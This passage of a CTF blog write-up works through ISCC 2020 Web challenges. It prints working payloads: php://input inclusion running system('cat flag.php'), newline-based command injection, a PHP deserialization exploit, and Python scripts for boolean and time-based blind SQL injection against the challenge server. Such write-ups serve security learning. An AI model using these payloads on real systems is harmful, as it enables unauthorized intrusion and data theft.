class=post-date title="2019-04-27 15:02:06">2019/04/27</span></a> <a class="全部文章 Web" href="/2019/04/26/一次团队内部比赛经历/" data-tag=BUG,PHP,SQL注入 data-author><span class=post-title title=一次团队内部比赛经历>一次团队内部比赛经历</span> <span class=post-date title="2019-04-26 22:59:01">2019/04/26</span></a> <a class="全部文章 Web" href="/2019/04/26/php mysql html css制作带Cookie登陆页面/" data-tag=MySQL,php,html,css,Databases data-author><span class=post-title title="php mysql html css制作带Cookie登陆页面">php mysql html css制作带Cookie登陆页面</span> <span class=post-date title="2019-04-26 10:08:26">2019/04/26</span></a> <a class="全部文章 CTF" href="/2019/04/16/CTF做题总结(一)/" data-tag=CTF,MISC,Crypto data-author><span class=post-title title=CTF做题总结(一)>CTF做题总结(一)</span> <span class=post-date title="2019-04-16 11:27:05">2019/04/16</span></a> <a class="全部文章 Web" href="/2019/04/15/Web开发-PHP基础篇(一~二)/" data-tag=Web,开发,PHP data-author><span class=post-title title=Web开发-PHP基础篇(一-二)>Web开发-PHP基础篇(一-二)</span> <span class=post-date title="2019-04-15 20:22:18">2019/04/15</span></a> <a class="全部文章 CTF" href="/2019/04/06/MISC-隐写的总结/" data-tag=CTF,MISC,隐写 data-author><span class=post-title title=MISC-隐写的总结>MISC-隐写的总结</span> <span class=post-date title="2019-04-06 18:33:32">2019/04/06</span></a> <a class="全部文章 CTF" href="/2019/04/06/MISC-zip压缩包的总结/" data-tag=CTF,MISC,ZIP data-author><span class=post-title title=MISC-zip压缩包的总结>MISC-zip压缩包的总结</span> <span class=post-date title="2019-04-06 00:21:56">2019/04/06</span></a> <a class="全部文章 Web" href="/2019/03/30/Web前端-CSS篇/" data-tag=Web,前端,CSS data-author><span class=post-title title=Web前端-CSS篇>Web前端-CSS篇</span> <span class=post-date title="2019-03-30 19:39:32">2019/03/30</span></a> <a class="全部文章 Web" href="/2019/03/25/Web前端-HTML篇/" data-tag=Web,前端,HTML data-author><span class=post-title title=Web前端-HTML篇>Web前端-HTML篇</span> <span class=post-date title="2019-03-25 22:54:31">2019/03/25</span></a> <a class="全部文章 Web" href="/2019/03/17/Github-Hexo的搭建/" data-tag=Web,Hexo,Github data-author><span class=post-title title=Github-Hexo简单搭建>Github-Hexo简单搭建</span> <span class=post-date title="2019-03-17 12:36:45">2019/03/17</span></a> <a class="全部文章 Web" href="/2019/03/15/html基础篇一/" data-tag=Web,前端 data-author><span class=post-title title=超文本标记语言html>超文本标记语言html</span> <span class=post-date title="2019-03-15 23:43:10">2019/03/15</span></a> <a class="全部文章 Databases" href="/2019/03/15/phpstudy-MySQL基础篇一/" data-tag=Web,数据库,phpstudy data-author><span class=post-title title=phpstudy-MySQL的简单使用以及cmd打开MySQL>phpstudy-MySQL的简单使用以及cmd打开MySQL</span> <span class=post-date title="2019-03-15 23:39:20">2019/03/15</span></a> <a class="全部文章 First" href="/2019/03/12/hello-world/" data-tag data-author><span class=post-title title="Hello world">Hello world</span> <span class=post-date title="2019-03-12 22:33:11">2019/03/12</span></a><div id=no-item-tips></div></nav><div id=outline-list></div></div></div><div class=hide-list><div class=semicircle data-title="切换全屏 快捷键 s"><div class="brackets first"><</div><div class=brackets>&gt;</div></div></div></aside><div id=post><div class=pjax><article id=post-ISCC2020练武题Web总结 class="article article-type-post" itemscope itemprop=blogPost><h1 class=article-title>ISCC2020练武题Web总结</h1><div class=article-meta><span class=book><i class="iconfont icon-category"></i> <a data-rel=CTF>CTF</a></span> <span class=tag><i class="iconfont icon-tag"></i> <a class=color4>CTF</a> <a class=color4>Web</a> <a class=color5>ISCC</a></span></div><div class=article-meta>发布时间 :<time class=date title="最后更新: 2020-06-06 00:55:53">2020-06-03 15:18</time></div><div class=article-meta><span id=busuanzi_container_page_pv>阅读 :<span id=busuanzi_value_page_pv><span class=count-comment><span class=spinner><div class=cube1></div><div class=cube2></div></span></span></span></span></div><div class=toc-ref><ol class=toc><li class="toc-item toc-level-3"><a class=toc-link href=#前言><span class=toc-text>前言</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web1：Where-is-file><span class=toc-text>Web1：Where is file?</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web2：阿森的爱情-1><span class=toc-text>Web2：阿森的爱情-1</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web3：寻找小明-2><span class=toc-text>Web3：寻找小明-2</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web4：阿森的爱情-2><span class=toc-text>Web4：阿森的爱情-2</span></a><ol class=toc-child><li class="toc-item toc-level-4"><a class=toc-link href=#过滤括号的盲注><span class=toc-text>过滤括号的盲注</span></a></li></ol></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web5：Php-is-the-best-language><span class=toc-text>Web5：Php is the best language</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web6：阿帅的爱情><span class=toc-text>Web6：阿帅的爱情</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web7：寻找小明-3><span class=toc-text>Web7：寻找小明-3</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web8：神秘组织的邮件-2><span class=toc-text>Web8：神秘组织的邮件-2</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web9：未知的风险-2><span class=toc-text>Web9：未知的风险-2</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web10：ISCC成绩查询-2><span class=toc-text>Web10：ISCC成绩查询-2</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web11：ISCC成绩查询-3：><span class=toc-text>Web11：ISCC成绩查询_3：</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web12：What-can-images-do><span class=toc-text>Web12：What can images do</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#Web13：未知的风险-1><span class=toc-text>Web13：未知的风险-1</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#后记><span class=toc-text>后记</span></a></li></ol><style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style></div><div class=article-entry itemprop=articleBody><h3 id=前言><a href=#前言 class=headerlink title=前言></a>前言</h3><p>接下来，继续总结练武题的Web题</p><h3 id=Web1：Where-is-file><a href=#Web1：Where-is-file class=headerlink title="Web1：Where is file?"></a>Web1：Where is file?</h3><p><strong>题目难度：简单</strong><br><strong>考察：伪协议</strong><br>打开题目，发现以下内容：</p><pre><code class=php>&lt;?php
show_source(__FILE__);
echo $_GET[&#39;hello&#39;];
$file=$_GET[&#39;file&#39;];
while (strstr($file, &quot;file://&quot;)) {
    $file=str_replace(&quot;file://&quot;, &quot;&quot;, $file);
}
include($file);
?&gt;</code></pre><p>发现很基础，使用伪协议(根据源码，不能使用file协议)读取flag内容：<br><strong>php://filter</strong><br><img src="http://img-blog.csdnimg.cn/20200511160925381.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br><strong>php://input</strong></p><pre><code class=php>?file=php://input
post: &lt;?php system(&#39;ls&#39;); ?&gt; //列目录
post: &lt;?php system(&#39;cat flag.php&#39;); ?&gt; //查看flag.php内容，但执行后要查看源代码才能看到</code></pre><p><img src="http://img-blog.csdnimg.cn/20200511161213272.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>等等其他伪协议。使用一个即可。(不过由于题目某些原因(可能是改题了)总结的时候，不能用<code>php://input</code>了)</p><h3 id=Web2：阿森的爱情-1><a href=#Web2：阿森的爱情-1 class=headerlink title=Web2：阿森的爱情-1></a>Web2：阿森的爱情-1</h3><p><strong>题目难度：简单</strong><br><strong>考察：目录扫描</strong><br><img src="http://img-blog.csdnimg.cn/2020051116260172.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>dirsearch直接扫，在readme.txt中发现flag<br>题应该中途改题了，写总结时，扫不出来了，并且直接访问readme.txt，也没flag</p><h3 id=Web3：寻找小明-2><a href=#Web3：寻找小明-2 class=headerlink title=Web3：寻找小明-2></a>Web3：寻找小明-2</h3><p><strong>考察：脑洞</strong><br>小明丢了2333.。。。。找遍了寻找小明-1也没找到线索。。。并且是0解题。</p><h3 id=Web4：阿森的爱情-2><a href=#Web4：阿森的爱情-2 class=headerlink title=Web4：阿森的爱情-2></a>Web4：阿森的爱情-2</h3><p><strong>题目难度：普通</strong><br><strong>考察：过滤括号<code>()</code>的SQL盲注</strong><br>fuzz一下，发现过滤了括号<code>()</code><br>这个是过滤括号<code>()</code>的SQL注入，在做某入群题时遇到过(虽然某入群题最终考察的不是这个)<br>并且当时还搜到了一篇博客：<a href=http://blog.csdn.net/nzjdsds/article/details/81879181 target=_blank rel=noopener>CTF中过滤括号的盲注题小记</a><br>这个题应该就是改博客里的那道题得到的。</p><h4 id=过滤括号的盲注><a href=#过滤括号的盲注 class=headerlink title=过滤括号的盲注></a>过滤括号的盲注</h4><p>这里先本地搭建环境，简单理解并测试一下这个知识点：<br>测试数据:</p><pre><code class=sql>+----+----------+----------------------------------+
| Id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | bfe42ac26e273ef3a859a651e0a02df0 |
+----+----------+----------------------------------+</code></pre><p>由于这道题显示的是第二列内容，于是可以通过使用<code>order by</code>操作第三列同时改变联合查询第三列的值，来判断网站数据库表中第三列下的数据。</p><pre><code class=sql>select * from test.test0 union select 1,2,&#39;c&#39; order by 3,2;</code></pre><p><code>order by 3,2</code>表示先以第三列排序，如果遇到第三列内容完全相同则再使用第二列进行相同行的排序。<br>而为了方便起见，这里只测试以第三列排序的：<br>payload</p><pre><code class=sql>select * from flag union select 1,2,&#39;c&#39; order by 3;</code></pre><p>当联合查询中第三列的字符如果小于等于真实的第三列密码字符则会页面会显示字符2，否则显示admin</p><pre><code class=sql>mysql&gt; select * from flag union select 1,2,&#39;a&#39; order by 3;
+----+----------+----------------------------------+
| Id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | a                                |
|  1 | admin    | bfe42ac26e273ef3a859a651e0a02df0 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql&gt; select * from flag union select 1,2,&#39;b&#39; order by 3;
+----+----------+----------------------------------+
| Id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | b                                |
|  1 | admin    | bfe42ac26e273ef3a859a651e0a02df0 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql&gt; select * from flag union select 1,2,&#39;c&#39; order by 3;
+----+----------+----------------------------------+
| Id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | bfe42ac26e273ef3a859a651e0a02df0 |
|  1 | 2        | c                                |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)</code></pre><p>于是通过对第三列进行排序可以判断第三列所存储的密码，其真实密码等于页面显示admin判定出来的每一个字符减1。<br>所以直接改一下脚本，跑脚本得到md5值，md5解密得到flag</p><pre><code class=py>import requests

url = &quot;http://101.201.126.95:7006/&quot;
alist = &quot;0123456789abcdef&quot;

payload = &quot;&quot;
payload1 = &quot;admin&#39; union select 1,2,&#39;&quot; #将&#39; or 1改成了admin&#39;
payload2 = &quot;&#39; from admin order by 3 #&quot;
datas = {&quot;username&quot;:&quot;&quot;,
         &quot;password&quot;:&quot;&quot;
     }
tmp_OK = &quot;&quot;
tmp = &quot;&quot;
for j in range(0,32):
    for i in alist:
        payload = payload1+tmp_OK+i+payload2
        datas[&quot;username&quot;] = payload
        #print datas
        r = requests.post(url=url,data=datas)
        #print r.text
        if &quot;admin&quot; in r.text: #将whaleadmin改成了admin
            tmp_OK += tmp
            print(tmp_OK)
            break
        if (&quot;2&quot; in r.text) and (i == &quot;f&quot;):
            tmp_OK += i
            print(tmp_OK)
        tmp = i</code></pre><p><img src="http://img-blog.csdnimg.cn/20200511173821902.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><h3 id=Web5：Php-is-the-best-language><a href=#Web5：Php-is-the-best-language class=headerlink title="Web5：Php is the best language"></a>Web5：Php is the best language</h3><p><strong>题目难度：简单</strong><br><strong>考察：PHP反序列化</strong><br>当时做的时候题目环境没问题。现在被大佬们搞崩了。也没截图，不过还好保存了源码，就本地搭个环境做一下好了。</p><pre><code class=php>&lt;?php  
@error_reporting(1);
include &#39;flag.php&#39;;
class baby 
{
    public $file;
    function __toString()      
    {
        if(isset($this-&gt;file))
        {
            $filename = &quot;./{$this-&gt;file}&quot;;
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}
if (isset($_GET[&#39;data&#39;]))
{
    $data = $_GET[&#39;data&#39;];
        $good = unserialize($data);
        echo $good;
}
else 
{
    $url=&#39;./index.php&#39;;
}

$html=&#39;&#39;;
if(isset($_POST[&#39;test&#39;])){
    $s = $_POST[&#39;test&#39;];
    $html.=&quot;&lt;p&gt;谢谢参与!&lt;/p&gt;&quot;;
}
?&gt;</code></pre><p>很明显，反序列化，构造exp</p><pre><code class=php>&lt;?php
class baby 
{
    public $file=&quot;flag.php&quot;;
    function __toString()      
    {
        if(isset($this-&gt;file))
        {
            $filename = &quot;./{$this-&gt;file}&quot;;
            if (base64_encode(file_get_contents($filename)))
            {
                return base64_encode(file_get_contents($filename));
            }
        }
    }
}
$test1=new baby;
print_r(serialize($test1));
?&gt;</code></pre><p>由exp生成payload:</p><pre><code class=php>O:4:&quot;baby&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;}</code></pre><p>输入payload，然后Base64解码，得到flag</p><pre><code class=php>PD9waHAgJGE9J2ZsYWd7dV9yX3JlYWxseV9hX3BocF9leHBlcnR9Jzs/Pg0K</code></pre><h3 id=Web6：阿帅的爱情><a href=#Web6：阿帅的爱情 class=headerlink title=Web6：阿帅的爱情></a>Web6：阿帅的爱情</h3><p><strong>题目难度：简单</strong><br><strong>考察：PHP代码审计+命令执行漏洞+绕过正则</strong></p><pre><code class=php>&lt;?php
if(!isset($_GET[&quot;ip&quot;])){
    show_source(__file__);
} else
{
    $ip=$_GET[&quot;ip&quot;];
    $pattern=&quot;/[;|&amp;].*[a-zA-Z]+/&quot;;
    if(preg_match($pattern,$ip)!=0){
        die(&#39;bad domain&#39;);
    }
    try {
        $result = shell_exec(&#39;ping -c 4 &#39; . $ip);
    }
    catch(Exception $e) {
        $result = $e-&gt;getMessage();
        echo $result;
    }
    $result = str_replace(&quot;\n&quot;, &quot;&lt;br&gt;&quot;, $result);
    echo $result;
}</code></pre><p>get传一个ip参数，然后对ip的参数值进行正则匹配。正则过滤命令执行的所有分隔符。<br>于是尝试绕过，找到有下面几种绕过方式：</p><pre><code class=php>%0acat
%0Acat</code></pre><p>参考：<a href=http://www.freebuf.com/articles/web/137923.html target=_blank rel=noopener>浅谈CTF中命令执行与绕过的小技巧</a><br>然后执行ls命令列出目录下的文件，发现flag.php。然后<code>cat flag.php</code>，下面其中一种方法的payload</p><pre><code class=shell>?ip=%0als
?ip=%0acat flag.php
或
?ip=127.0.0.1%0als
?ip=127.0.0.1%0acat flag.php</code></pre><p><img src="http://img-blog.csdnimg.cn/20200521220909965.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br><img src="http://img-blog.csdnimg.cn/20200521221011603.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><h3 id=Web7：寻找小明-3><a href=#Web7：寻找小明-3 class=headerlink title=Web7：寻找小明-3></a>Web7：寻找小明-3</h3><p>小明丢了。。。师傅们估计是盲猜出来的ip。</p><h3 id=Web8：神秘组织的邮件-2><a href=#Web8：神秘组织的邮件-2 class=headerlink title=Web8：神秘组织的邮件-2></a>Web8：神秘组织的邮件-2</h3><p><strong>题目难度：普通</strong><br><strong>考察：计算题脚本编写</strong><br>打开题目链接<br><img src="http://img-blog.csdnimg.cn/20200517233956626.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>发现5个数字，由神秘组织的邮件-1的<code>flag{加减乘除}</code>，想到应该是将上边五个数中间添加上“加减乘除”，并且需要在极短的时间内计算并提交结果，于是写脚本即可。同时做这道题发现了一道类似的脚本题：<a href=https://blog.csdn.net/Ruhe_king/article/details/82530056 target=_blank rel=noopener>bugku 秋名山老司机 以及 hackinglab 快速口算</a><br>于是我写出这道题的加减乘除计算并提交结果的脚本(写完后，发现这个脚本并没有想象中的那么难)：</p><pre><code class=py>import re
import requests

url=&quot;http://101.201.126.95:7010/&quot;
headers={&quot;Cookie&quot;:&quot;PHPSESSID=e8iv7en9e33sqp6mi0j2c6ff7i&quot;}
s=requests.Session()
r=s.get(url,headers=headers)
content=r.text

content=re.sub(r&quot;&lt;/?(.+?)&gt;&quot;,&quot;&quot;,content)#去掉html标签
content=re.sub(&#39;Result:&#39;,&#39;&#39;,content) #替换Result:为空
content=content.strip() #去除字符串左右两端的空格和\t、\r、\n
print(content)

num=content.split(&#39;  &#39;) #这里是空格当做列表分隔符
print(num)
#num = list(map(int, n))#将列表转换为int型
#payload=num[0]+num[1]-num[2]*num[3]/num[4]
payload=int(num[0])+int(num[1])-int(num[2])*int(num[3])/int(num[4])
print(payload)

data = {&quot;result&quot;:payload}
r = s.post(url=url+&quot;result.php&quot;,headers=headers,data=data)
print(r.text)</code></pre><p>顺带贴出我们团队的lemon写的脚本(有时候跑一次跑不出来结果，需要多跑几次，不晓得为啥)，用到了Python爬虫的解析库BeautifulSoup(Python爬虫我才学一点，还不太熟悉，所以我写脚本就没用它)</p><pre><code class=py>import re
import requests
from bs4 import BeautifulSoup

url=&quot;http://101.201.126.95:7010/&quot;
headers={&quot;Cookie&quot;:&quot;PHPSESSID=e8iv7en9e33sqp6mi0j2c6ff7i&quot;}
s=requests.Session()
response=s.get(url,headers=headers)
content=response.text
#print(r)
soup = BeautifulSoup(content,&#39;lxml&#39;)
li_list = soup.find_all(text=re.compile(&#39;\d&#39;))
result = [x.strip() for x in li_list if x.strip()!=&#39;&#39;]
str = &quot;&quot;.join(result)
a=str.split(&#39;  &#39;)
numbers = list(map(int, a))
print(numbers)
payload =numbers[0]+numbers[1]-numbers[2]*numbers[3]/numbers[4]
print(payload)
data = {&#39;result&#39;: payload}
reponse = requests.post(url=url+&quot;result.php&quot;,headers=headers,data=data).text
print(reponse)</code></pre><p>跑脚本，得到文件名(同时是测出来是安卓题<code>神秘组织的邮件-3</code>的压缩包密码)。<br><img src="http://img-blog.csdnimg.cn/2020051801343090.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>浏览器访问txt文件失败，使用python脚本访问成功</p><pre><code class=py>import requests

url=&quot;http://101.201.126.95:7010/IS20CC20abc%$.txt&quot;
r=requests.get(url).text
print(r)</code></pre><p><img src="http://img-blog.csdnimg.cn/20200518014809451.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>发现如果result解码后的结果等于flag.php，跳转到flag.php。我觉得整正常情况下直接在上边post传入result参数，且参数值是flag.php的Base64编码后的结果，即</p><pre><code class=py>import requests

url=&quot;http://101.201.126.95:7010/result.php&quot;
headers={&quot;Cookie&quot;:&quot;PHPSESSID=e8iv7en9e33sqp6mi0j2c6ff7i&quot;}
data={&#39;result&#39;:&#39;ZmxhZy5waHA=&#39;}
r=requests.post(url=url,headers=headers,data=data).text
print(r)</code></pre><p>然而题可能出的有点问题(仅代表个人观点)，直接访问flag.php就得到flag了2333333。。。。(还有个坑就是注意不要直接写脚本访问，可以使用burp抓包改包发包)。<br><img src="http://img-blog.csdnimg.cn/20200518020159805.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>如果题目是这样的话，直接尝试burp抓包访问flag.php不就好了(这应该就是传说中的另类的盲猜flag了?!)。不过按照上边正常的思路来可以得到<code>IS20CC20abc%$.txt</code>，而神秘组织的邮件-3的压缩包密码就是<code>IS20CC20abc%$</code>，还是有一点用处的。。。。</p><h3 id=Web9：未知的风险-2><a href=#Web9：未知的风险-2 class=headerlink title=Web9：未知的风险-2></a>Web9：未知的风险-2</h3><p><strong>题目难度：较难</strong><br><strong>考察：File Vault</strong><br>原题改的，没搞出来。现在也无法复现，于是参考wp学习一下<br>可以参考：<br><a href=http://www.anquanke.com/post/id/206658 target=_blank rel=noopener>ISCC 2020 Web WriteUp</a><br><a href="http://www.jianshu.com/p/972327151eff?tdsourcetag=s_pctim_aiomsg" target=_blank rel=noopener>insomnihack-teaser-2018/file-vault 学习</a><br><a href=http://corb3nik.github.io/blog/insomnihack-teaser-2018/file-vault target=_blank rel=noopener>Insomnihack Teaser 2018 / File Vault</a></p><h3 id=Web10：ISCC成绩查询-2><a href=#Web10：ISCC成绩查询-2 class=headerlink title=Web10：ISCC成绩查询-2></a>Web10：ISCC成绩查询-2</h3><p><strong>题目难度：普通</strong><br><strong>考察：SQL时间盲注+过滤空格和<code>#</code></strong><br>看到题，先在用扫描工具扫一下，发现flag.php<br><img src="http://img-blog.csdnimg.cn/20200521222016851.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>然后直接访问<code>http://101.201.126.95:7007/flag.php</code>发现直接跳转到index.php。于是使用burp进行抓包重放<br>发现是从pikachu靶场sql注入改的<br><img src="http://img-blog.csdnimg.cn/20200521222352180.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>并且需要get传参两个参数name和submit<br><img src="http://img-blog.csdnimg.cn/20200521222511955.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>然后传参，无论怎么测试，就只显示一个页面(也就是所谓无回显)，于是考虑SQL时间盲注<br><img src="http://img-blog.csdnimg.cn/20200521222810298.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>先fuzz一下，发现过滤了空格和#，<code>空格</code>可用<code>/**/</code>代替，<code>#</code>可以用<code>%23</code>代替。<br>参考：<a href=http://www.0x002.com/2020/%E5%AF%B9MYSQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3%E5%86%85%E5%AE%B9%E5%8F%8A%E9%83%A8%E5%88%86Trick%E7%9A%84%E5%BD%92%E7%B1%BB%E5%B0%8F%E7%BB%93/#%E9%80%97%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4-%E6%8B%A6%E6%88%AA target=_blank rel=noopener>对MYSQL注入相关内容及部分Trick的归类小结</a><br>于是写出测试的基本语句，并测试：</p><pre><code class=sql>&#39;/**/or/**/if(1=1,sleep(3),1)%23</code></pre><p><img src="http://img-blog.csdnimg.cn/20200521223203799.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>发现果然响应比正常慢了很多，说明测试语句没问题。开始进行盲注，于是我写出解题脚本：</p><pre><code class=py>import requests
import string
import time
import datetime

if __name__ == &quot;__main__&quot;:
    chars=string.ascii_letters+string.digits
    url=&quot;http://101.201.126.95:7007/flag.php&quot;
    #payload=&quot;&#39;/**/or/**/if((ascii(substr(database(),{0},1))={1}),sleep(3),1)%23&quot; #pikachu
    #payload=&quot;&#39;/**/or/**/if((ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1),{0},1))={1}),sleep(3),1)%23&quot;#flag
    #payload=&quot;&#39;/**/or/**/if((ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name=\&quot;flag\&quot;/**/limit/**/0,1),{0},1))={1}),sleep(3),1)%23&quot;
    payload=&quot;&#39;/**/or/**/if((ascii(substr((select/**/flag/**/from/**/flag/**/limit/**/0,1),{0},1))={1}),sleep(3),1)%23&quot;
    print(&quot;数据：&quot;)
    name=&#39;&#39;
    for i in range(1,40):
        char=&#39;&#39;
        for j in chars:
            payloads=payload.format(i,ord(j))
            urls=url+&quot;?name=&quot;+payloads+&quot;&amp;submit=%E6%9F%A5%E8%AF%A2&quot;
            t1=datetime.datetime.now()
            r=requests.get(url=urls)
            t2=datetime.datetime.now()
            sec = (t2 - t1).seconds
            if sec&gt;=3:
                name+=j
                print(name)
                char=j
                break
        if char==&#39;&#39;:
            break</code></pre><p>依次跑上边的脚本，得到当前数据库名、数据表名、字段名和记录。<br><img src="http://img-blog.csdnimg.cn/20200521224102133.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>发现是md5加密后的，找一个在线的md5解密网站解密即可。<br>解密结果是<code>sixsixsix</code>，即是flag，加上flag{}提交即可。<br>看了一下<code>ISCC成绩查询-3</code>，很明显<code>666</code>是是线索，也就是key。于是顺带做出<code>ISCC成绩查询-3</code></p><h3 id=Web11：ISCC成绩查询-3：><a href=#Web11：ISCC成绩查询-3： class=headerlink title=Web11：ISCC成绩查询_3：></a>Web11：ISCC成绩查询_3：</h3><p><strong>题目难度：简单</strong><br><strong>考察：PHP可逆加密解密算法</strong><br>进入题目F12查看源码，发现以下代码：</p><pre><code class=php>&lt;?php
function encrypt($data, $key)
{
    $key = md5($key);
    $x  = 0;
    $len = strlen($data);
    $l  = strlen($key);
    for ($i = 0; $i &lt; $len; $i++)
    {
        if ($x == $l) 
        {
         $x = 0;
        }
        $char .= $key{$x};
        $x++;
    }
    for ($i = 0; $i &lt; $len; $i++)
    {
        $str .= chr(ord($data{$i}) + (ord($char{$i})) % 256);
    }
    return base64_encode($str);
}
?&gt;</code></pre><p>百度一搜，发现是原题参考：<a href=http://blog.csdn.net/iteye_17658/article/details/82677761 target=_blank rel=noopener>PHP 加密与解密</a>、<a href=http://www.iteye.com/blog/panyongzheng-1967038 target=_blank rel=noopener>PHP加密解密代码</a><br>bugku上也有类似的，就变了一点的题，参考：<a href=http://www.cnblogs.com/xhds/p/12231833.html target=_blank rel=noopener>bugku-PHP_encrypt_1(ISCCCTF)</a><br>不过还是自己先审计一下代码的大致意思，自己写一下解密：</p><pre><code class=php>1.定义一个函数，接收data和key
2.对传过来的key进行md5加密赋值给$key；令变量$x = 0；将传过来的data取长度赋值给$len；将传过来的key取长度赋值给$l
3.然后来一个for循环，将md5加密后key进行截取和data长度一样，并存放在$char。
4.然后再来一个for循环，让(原文每个字符+密钥对应每个字符)%256得到密文，赋值给$str
5.对$str进行base64加密后，返回。</code></pre><p>于是考虑解密算法大致应该这样写：</p><pre><code class=php>1.先算出key的md5，即是密钥
2.然后对data进行base64解码得到密文
3.密文每个字符-密钥，如果&lt;0再加256；否则不用加
4.最后返回最终结果</code></pre><p>于是写出对应(将题目中的字符串作为data，ISCC成绩查询_2得到的666作为key)解密的PHP脚本：</p><pre><code class=php>&lt;?php
function decrypt($data, $key){
    $key = md5($key);
    $x = 0;
    $data = base64_decode($data);
    $len = strlen($data);
    $l = strlen($key);
    for ($i = 0; $i &lt; $len; $i++){
        if ($x == $l){
            $x = 0;
        }
        $char .= substr($key, $x, 1);
        $x++;
    }
    for ($i = 0; $i &lt; $len; $i++){
        if (ord(substr($data, $i, 1)) &lt; ord(substr($char, $i, 1))){
            $str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1)));
        }else{
            $str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1)));
        }
    }
    return $str;
}
$data = &#39;qKe4j6uFeqaTe5rVqqaXiKig25o=&#39;; // 被加密信息
$key = &#39;666&#39;; // 密钥
$decrypt = decrypt($data, $key);
echo $decrypt;
